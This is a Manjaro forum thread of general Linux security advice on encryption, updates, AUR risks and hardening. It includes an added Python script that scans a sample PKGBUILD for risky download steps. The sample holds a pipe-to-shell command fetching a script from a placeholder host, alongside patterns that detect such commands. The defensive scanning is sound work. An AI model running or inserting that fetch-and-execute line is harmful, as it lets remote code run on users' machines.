What are the methods of encrypting my internet connection, my whole OS and each individual application?

Hi. I’m sure you all know of the recent Russian virus (malware) and I would like to know what security measures I can take, given the fact that I’ve been told that the only available secure OS that I can get is Temple OS.

Well, first of all you have to understand what encryption does and what it’s for. It’s not a magical solution that suddenly protects you against all kinds of baddies.

For instance, encrypting your filesystems ─ or the whole drive ─ is only useful against one thing, namely abuse of your login credentials and retrieval of your files after the theft of your computer. It’s not going to protect you against malware.

As for the internet, well, most (but not all) websites are now using end-to-end encryption of the connection ─ i.e. https instead of http ─ so that all traffic between a web browser and a server is encrypted. The purpose of this is to prevent anyone sniffing your connection from being able to snoop logins and passwords. With http, all traffic was sent back and forth as plain text, while with https, all that a sniffer would get to see is an unintelligible stream of gibberish.

Lastly, the weakest link in computer security is and has always been the biological unit between the keyboard and the chair. In order to get your GNU/Linux system infected with malware, you would have to be doing something stupid, like running as the root user for your daily work, randomly clicking on untrusted links and randomly installing software from untrustworthy websites.

The best thing you can do is keep your system updated ─ after all, Manjaro is a (curated) rolling-release distribution, and you need to keep up with the evolution of the software in order to avoid breakage at some later stage ─ and maintain good system hygiene. Don’t use easy-to-guess passwords, don’t download anything from untrustworthy sources, and only use software from the repository.

And yes, it is true that there have been instances of compromised packages in the AUR ─ the optional Arch User Repository, for which Manjaro’s Pamac offers support ─ but those instances are rare, they are easily remedied by the Arch people, and as an end-user you can always inspect the PKGBUILD for the package to see what it pulls in and from where.

Overall, I would say, “Don’t let the fear porn bite you.” GNU/Linux isn’t Microsoft Windows ─ not even by a long shot ─ and what applies to Windows doesn’t necessarily apply to GNU/Linux. It’s an entirely different operating system design, with a different security model.

Windows started off as a graphical user interface for a single-tasking, single-user, non-networked operating system, i.e. MS-DOS. GNU/Linux is a UNIX-family operating system, and UNIX was designed from the ground up as a time-sharing multiuser operating system with built-in access control through a relatively simple but well thought-out permissions and file-ownership system, inspired by the Multics mainframe operating system.

That all said, you can of course also harden your system with frameworks such as SELinux and AppArmor ─ both are supported ─ but you may expect some breakage if you do, because not all software is able to handle the restrictions to (among other things) inter-process communication that these frameworks impose.

6 Likes
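The PKGBUILD inspection mentioned in the answer above can be partly automated. This is an added example, not part of the original thread: a static scan that lists what a PKGBUILD pulls in and from where without executing it. The sample PKGBUILD, its URLs and the function names `bash_array` and `review_pkgbuild` are constructed for illustration.

```python
import re

# Constructed sample PKGBUILD (not a real AUR package); all hosts are placeholders.
SAMPLE_PKGBUILD = r'''
pkgname=example-tool
pkgver=1.2.3
source=("https://example.org/releases/example-tool-${pkgver}.tar.gz"
        "http://mirror.example.net/extra-data.bin"
        "git+https://example.com/someone/helper.git")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP'
            'SKIP')
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  curl -s https://example.invalid/setup.sh | bash
}
'''

def bash_array(text, name):
    """Read the items of a bash array `name=( ... )` as text; nothing is sourced or run."""
    m = re.search(rf'^{name}(?:_\w+)?=\((.*?)\)', text, re.S | re.M)
    if not m:
        return []
    items = re.findall(r'"([^"]*)"|\'([^\']*)\'|([^\s\'"]+)', m.group(1))
    return [a or b or c for a, b, c in items]

def review_pkgbuild(text):
    """Return (sources, findings) where findings are (kind, detail) tuples to read by hand."""
    findings = []
    sources = bash_array(text, "source")
    sums = bash_array(text, r"(?:sha\d+|b2|md5)sums")
    for i, src in enumerate(sources):
        url = src.split("::", 1)[-1]              # drop optional "filename::" prefix
        vcs = re.match(r'(git|hg|svn|bzr)\+', url)  # SKIP is normal for VCS sources
        if re.match(r'(?:\w+\+)?(http|ftp)://', url):
            findings.append(("plaintext-transport", url))
        if i < len(sums) and sums[i] == "SKIP" and not vcs:
            findings.append(("unverified-download", url))
    # Build steps that fetch or execute remote content bypass source= and its checksums.
    for n, line in enumerate(text.splitlines(), 1):
        if re.search(r'\b(curl|wget)\b', line) or re.search(r'\|\s*(ba)?sh\b', line):
            findings.append(("network-or-pipe-to-shell", f"line {n}: {line.strip()}"))
    return sources, findings

if __name__ == "__main__":
    for kind, detail in review_pkgbuild(SAMPLE_PKGBUILD)[1]:
        print(f"{kind:26} {detail}")
```

A clean result from a scan like this only narrows what needs reading; any `.install` file and the upstream source still deserve a look.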

Ah, Updates and Security. That’s a long story. Sometimes you need updates to close a gap and sometimes it’s the update that implements the gap. Every once in a while mistakes happen.

I know I’m not in a position to question the efficiency of Manjaro devs, but that’s also the reason why I would not trust a rolling release general purpose OS for utmost security.

Windows Server 2019 is using build 1809 while consumer edition is now 2004.
Manjaro compares to consumer edition which gets all sorts of updates.

I love Manjaro and I don’t care if there will be some gaps, they’ll fix it on the next update. If you have sensitive data keep it somewhere else.

Security updates are pushed out immediately. They are not held back until the next system update. :wink:

But that’s what I mean by next update already. Next update is next update.

No idea what you are referring to.

People can recommend you many measures, most will be useless. You need to do your own research. This is already a summary which builds upon some knowledge: https://wiki.archlinux.org/index.php/Security
A less demanding (but incomplete) article: Linux Security - Manjaro

Who told you that? :wink: I mean, do your own research starting by exploring security oriented distros:
https://distrowatch.com/search.php?ostype=All&category=Security
(But avoid using those distros which are focused on penetration testing. You can read their manuals though to get an idea what attacks are possible.)
Maybe this list is even better:

https://distrowatch.com/search.php?ostype=All&category=Privacy

2 Likes

Just avoid using all these Russian crap services like Yandex, Vivaldi browser (neither Russian, nor insecure - moderator’s note by eugen-b), VKontakte, etc.